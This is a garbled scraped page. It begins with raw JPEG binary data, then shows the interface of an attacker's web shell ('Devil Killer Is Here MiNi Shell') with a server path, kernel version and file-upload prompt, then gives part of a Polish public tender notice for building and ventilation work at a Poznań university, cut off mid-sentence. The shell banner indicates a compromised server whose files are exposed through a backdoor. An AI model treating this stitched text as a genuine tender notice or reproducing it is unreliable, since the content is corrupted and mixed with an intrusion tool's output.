JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240528/0034210001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pomieszczeń na drugim piętrze budynku A wraz z budową nowej klimatyzacji oraz przebudowa instalacji wentylacyjnej dla części budynku A </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Ekonomiczny w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001525</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-875</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ue.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ue.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pomieszczeń na drugim piętrze budynku A wraz z budową nowej klimatyzacji oraz przebudowa instalacji wentylacyjnej dla części budynku A </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e64d940-1cca-11ef-a7c1-72acb4a2af8f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00342100</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028216/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa Centrum Informatyki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/uep <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/uep</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Z zastrzeżeniem wyjątków o których<br/>mowa w SWZ komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu platformy zakupowej (dalej zwanej<br/>„Platformą”) pod adresem: https://platformazakupowa.pl/pn/uep<br/>2. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń, o których mowa w niniejszej SWZ,<br/>składane są przez wykonawcę wyłącznie za pośrednictwem platformy zakupowej: https://platformazakupowa.pl/pn/uep<br/>3. Zamawiający informuje, że adres e-mail: zp@ue.poznan.pl - wskazany w ogłoszeniu o zamówieniu, służy jedynie do<br/>przesyłania ogłoszeń przez zamawiającego i otrzymywania informacji zwrotnej z Dziennika Urzędowego Unii Europejskiej. Nie jest to<br/>adres do komunikacji między<br/>zamawiającym a wykonawcami.<br/>4. Celem skomunikowania się z zamawiającym (z wyłączeniem złożenia oferty, przedmiotowych środków dowodowych lub<br/>oświadczeń składanych razem z ofertą) wykonawca korzysta z przycisku „wyślij wiadomość do zamawiającego” na platformie<br/>zakupowej. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez kliknięcie<br/>przycisku „wyślij wiadomość do zamawiającego” i pojawieniu się komunikatu, że wiadomość została wysłana do zamawiającego.<br/>5. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji warunków zamówienia, zmiany<br/>terminu składania i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem https://platformazakupowa.pl do konkretnego wykonawcy na adres e-mail podany przez wykonawcę w Formularzu<br/>oferty.<br/>6. Zamawiający, zgodnie Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na https://platformazakupowa.pl/pn/uep, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>c) przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji;<br/>d) włączona obsługa JavaScript;<br/>e) łącze internetowe o przepustowości co najmniej 256 kbit/s;<br/>f) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>g) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>h) platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli;<br/>i) akceptująca pliki typu „cookies”;<br/>j) oznaczenie czasu odbioru danych przez platformazakupowa.pl stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg.<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>7. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Uniwersytet Ekonomiczny w Poznaniu.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: rodo@ue.poznan.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy PZP<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/015/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Przebudowa pomieszczeń na drugim piętrze budynku A wraz z budową nowej klimatyzacji oraz przebudowa instalacji wentylacyjnej dla części budynku A.<br/>2.	Przedmiot umowy obejmuje roboty, prace i dostawy w następującym zakresie: <br/>1)	przebudowa budynku A oraz sąsiedniego budynku garażu Uniwersytetu Ekonomicznego w Poznaniu zgodnie z dokumentacją projektową pn.: „PRZEBUDOWA POMIESZCZEŃ NA POZIOMIE PRZYZIEMIA, II ORAZ III PIĘTRA BUDYNKU A, UNIWERSYTETU EKONOMICZNEGO W POZNANIU PRZY AL. NIEPODLEGŁOŚCI 10, WRAZ Z BUDOWĄ NOWEJ KLIMATYZACJI DLA CZĘŚCI BUDYNKU A ORAZ PRZEBUDOWĄ INSTALACJI WENTYLACYJNEJ DLA STREFY KUCHNI I SALI WYKŁADOWEJ W PRZYZIEMIU BUDYNKU A” autorstwa BIPROINSTAL Rafał Marciniak z grudnia 2023 r.<br/>2)	przebudowa istniejącego systemu automatyki wentylacji kuchni oraz budowa nowego systemu automatyki dla maszynowni wody lodowej zgodnie z projektami technicznymi automatyki opracowanymi przez firmę BCD AUTOMATYKA, które stanowią uzupełnienie dla dokumentacji projektowej opracowanej przez firmę BIPROINSTAL (patrz Zakres A) oraz w oparciu o niezbędne projekty warsztatowe i uzgodnienia z Zamawiającym (patrz Zakres C).<br/>3)	wykonanie prac uzupełniających dla zakresu A oraz B polegających na opracowaniu projektów warsztatowych, ich uzgodnieniu z Zamawiającym i Nadzorem Autorskim oraz na ich podstawie realizacji prac budowlanych, instalacyjnych, montażowych, programistycznych oraz dostaw wyposażenia.<br/>4)	opracowanie i przekazanie 2 egzemplarzy zbiorczej dokumentacji powykonawczej w wersji papierowej i elektronicznej (pliki edytowalne i nieedytowalne) dla robót budowlanych i instalacyjnych zrealizowanych przez Wykonawcę w ramach zakresu A, B i C z podziałem na dokumentację powykonawczą wykonaną na podstawie projektu budowlanego (2 egzemplarze) - w celu zgłoszenia zakończenia robót budowlanych oraz dokumentację powykonawczą wykonaną na podstawie projektów technicznych wykonawczych przekazanych przez Zamawiającego i projektów warsztatowych opracowanych przez Wykonawcę (2 egzemplarze), zgodnie z wymaganiami szczegółowymi zebranymi w załączniku nr 12 do SWZ.<br/>5)	przeprowadzenie przez Wykonawcę, na koszt i staraniem Wykonawcy wszystkich niezbędnych testów, pomiarów i sprawdzeń potwierdzających poprawność działania oraz osiągnięcie projektowanych parametrów wykonanych oraz przebudowanych instalacji, w tym zapewnienie urządzeń pomiarowych oraz zapewnienie urządzeń symulujących działanie elementów automatyki, w celu potwierdzenia poprawności w zakresie wykonanych oraz przebudowanych i dostarczonych systemów automatyki oraz instalacji i systemów okablowania sieci komputerowej, systemu Kontroli Dostępu.<br/>6)	Przeprowadzenie przez Wykonawcę, na koszt i staraniem Wykonawcy, na podstawie wydanego przez Zamawiającego pełnomocnictwa postępowania w Urzędzie Dozoru Technicznego dotyczącego zgłoszenia urządzeń maszynowni wody lodowej podlegających dozorowi technicznemu oraz uzyskania decyzji zezwalającej na eksploatację tych urządzeń oraz maszynowni wody lodowej jako zespołu urządzeń, w tym zapewnienia przez Wykonawcę własnym staraniem i na swój koszt, przeprowadzenia przez odpowiednią notyfikowaną jednostkę oceny zgodności zgodnie z dyrektywą ciśnieniową zakończoną wydaniem deklaracji zgodności dla zespołu urządzeń tworzących instalację maszynowni wody lodowej, wraz z przygotowaniem przez Wykonawcę wszystkich niezbędnych dokumentów dla przeprowadzenia ww. procedur i przekazaniem kopii ww. dokumentów oraz kopii korespondencji z UDT do Zamawiającego, oraz zawiadomienia o zakończeniu budowy i zamiarze przystąpienia do użytkowania obiektu po przebudowie do Państwowej Inspekcji Sanitarnej oraz Państwowej Straży Pożarnej, a po zajęciu stanowisk przez powyższe instytucje lub braku sprzeciwu tych instytucji, przekazanie zawiadomienia o zakończeniu budowy do organu Nadzoru Budowlanego i uzyskaniu od Nadzoru Budowlanego stosownej decyzji w przedmiotowej sprawie, wraz z przygotowaniem przez Wykonawcę wszystkich niezbędnych dokumentów dla przeprowadzenia ww. procedur i z przekazaniem kopii ww. dokumentów oraz kopii korespondencji z ww. instytucjami do Zamawiającego.<br/>Uwaga: prace budowlane i instalacyjne będą prowadzone w i przy budynku użyteczności publicznej (uczelni wyższej), nie wyłączonym z użytkowania, wpisanym do rejestru zabytków nieruchomych <br/>pod nr A 226, decyzją z dn. 20.03.1980 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">330 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje zamówienia, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp - zlecenie Wykonawcy robót i prac w trybie z wolnej<br/>ręki w zakresie wykonania II etapu prac w maszynowni wody lodowej oraz na dachu garażu wraz z przynależną automatyką zgodnie<br/>z dokumentacjami projektowymi na podstawie których realizowane będą aktualnie zlecane prace.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca musi złożyć oświadczenie o przychodzie w obszarze objętym zamówieniem za okres nie dłuższy niż ostatnie 3 lata obrotowe (za 2021 rok, 2022 rok, 2023 rok) – a jeżeli okres działalności jest krótszy - za ten okres w wysokości średniorocznie co najmniej 2 000 000,00 zł brutto złotych <br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Wykonawca musi posiadać wiedzę i doświadczenie w zakresie wykonania: robót budowlano – instalacyjnych, robót instalacyjnych branży klimatyzacyjnej, chłodniczej lub branży grzewczej w zakresie pomp ciepła, robót instalacyjnych branży wentylacyjnej, robót instalacyjnych branży elektrycznej silno i niskoprądowej oraz konfiguracji instalacji kontroli dostępu. <br/>Wykonawca spełni powyższy warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie poniższy zakres prac: <br/>I)	co najmniej jedno zamówienie polegające na przebudowie lub remoncie budynku wpisanego do rejestru zabytków nieruchomych lub znajdującego się w strefie ochrony konserwatorskiej, o wartości min. 200 000 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy),<br/>II)	co najmniej jedno zamówienie polegające na przebudowie budynku użyteczności publicznej (zamówienie musi obejmować także roboty instalacyjne), o wartości min. 500 000 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy), <br/>III)	co najmniej jedno zamówienie obejmujące roboty instalacyjne branży klimatyzacyjnej, chłodniczej lub branży grzewczej w zakresie maszynowni wody lodowej lub maszynowni pomp ciepła, o wartości min. 200 000 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy) polegające na wykonaniu instalacji klimatyzacyjnej, chłodniczej, glikolowej, bazujących na instalacjach hydraulicznych tj. instalacjach wody lodowej, wodnych lub glikolowych instalacjach grzewczych lub chłodniczych, wraz z niezbędną automatyką; <br/>IV)	co najmniej jedno zamówienie obejmujące roboty instalacyjne branży wentylacyjnej, o wartości min. 200 000 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy) polegające na wykonaniu instalacji wentylacyjnych nawiewno-wywiewnych wraz z niezbędną automatyką, <br/>V)	co najmniej jedno zamówienie obejmujące roboty instalacyjne branży elektrycznej silno i niskoprądowej o wartości min. 100 000 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy),<br/>VI)	co najmniej jedno zamówienie w 